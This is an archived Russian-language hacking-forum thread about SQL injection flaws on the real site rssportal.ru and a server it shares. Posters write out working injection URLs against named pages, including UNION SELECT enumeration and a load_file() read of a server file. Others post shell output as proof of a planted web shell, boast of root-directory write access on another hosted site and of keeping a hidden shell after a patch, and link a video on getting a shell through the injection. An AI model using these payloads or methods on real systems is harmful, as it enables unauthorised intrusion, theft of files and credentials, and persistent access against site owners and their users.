Просмотр полной версии : Injection на rssportal.ru
Injection на rssportal.ru
Хотелось бы отметить ету инж., так как там есть сами посмотрите что :)
Хотя ето не новость :)
Вот ищо несколько injection на етом же сайте:
http://rssportal.ru/catalog.php?rss_id=-54161+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20
http://rssportal.ru/catalog.php?cat_id=-1+UNION+SELECT+1,name,3,4,5,6,7,8+FROM+category/*
http://rssportal.ru/registration.php?uid=1&confirm=blablabla'
Вот и видео: http://video.antichat.ru/download_228.html
Смотрел на ускоренном воспроизведении(: Видео не стоило снимать имхо. Инъекция стандартна. Могли простенькую шифровку пассов поставить..
PS Вот если бы ты шелл залил, был бы хоть какой то материал.
http://rssportal.ru/catalog.php?cat_id=-57+UNION+SELECT+1,load_file(%22/home/rss/rssagg.wrk.infostars.ru/htdocs/admin.php%22),3,4,5,6,7,8+FROM+user+WHERE+id=2/*
даж файлы читать мона)
Вот если бы ты шелл залил, был бы хоть какой то материал.
Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux
uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss)
;)
.
Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux
uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss)
;)
Вот если бы кто нибудь рут взял;)
на серваке кстати хостится press.webfile.ru с записью в корень сайта =)
на серваке кстати хостится press.webfile.ru с записью в корень сайта =)
На webfile.ru запись в корень сайта есть и скуль...шелл тоже там есть :)
Да и админка там есть )))
Да и приват на ачате никогда не палиться половиной ачата
УУУ пацаны опередили меня))) я то тоже там нашел маса инэекцый и багов.. но б**я никак неполучалося достучаца нормально.=\
Вот недавно прикрыли багу, и шелл. Но я успел припрятать ищо один...))
А вот и старое видео по Создание шелла через SQL_injection на rssportal.ru:
http://webfile.ru/1455194
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot